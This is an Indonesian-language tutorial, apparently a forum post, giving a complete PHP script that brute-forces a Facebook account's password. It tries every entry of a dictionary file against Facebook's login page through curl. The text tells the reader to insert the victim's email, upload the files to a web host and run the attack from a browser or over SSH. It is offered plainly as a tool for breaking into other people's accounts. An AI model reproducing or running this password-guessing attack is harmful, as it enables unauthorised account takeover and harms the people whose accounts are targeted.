Tutorial brute force & script code

Bahan2 yg di butuhkan:

Upload 3 file berikut di web hosting kamu (usahakan yg berbayar, coz klo yg gratisan suka ga support) Cry

1.fb.php yang isinya skrip brute force
2.dictionary.txt
3.cookie.txt

ingat musti satu folder

edit bagian ini $username ="brute@force.com";

ganti dgn email korban

jalankan/eksekusi /fb.php .

Oke, ini skrip brute force-nya :

################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.com"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
";}
}
?>


Oke, ada 2 cara meng-eksekusi file fb.php/skrip brute force.

1.) Menggunakan web browser. Cara ini mudah, tapi relatif lbh lama. Karna kita tau, kalau modus grafis selalu lebih lamban di banding modus text. Cara nya tinggal upload semua file2 di atas ke web hosting, lalu jalankan melalui browser. Gampang kan? tampi lambreta abisss!. Web browser favorit saya adalah Opera.

2.)Menggunakan SSH client. Cara ini lbh cepat, tapi relatif lbh sulit. Selain itu kita jg harus punya web hosting sendiri, coz web hosting gratisan biasa-nya tidak akan memberi hak SSH pada kita Tolong. Cara-nya kita harus meng-eksekusi skrip via SSH client/console yg sudah terkoneksi ke server kita. SSH client favorit saya adalah Putty.

Ingat, tidak semua FB bisa di crack dng cara ini... semua tergantung database dari Dictionary.txt jg dari tinggkat kerumitan Password. So... inti-nya cuma satu... SABAR...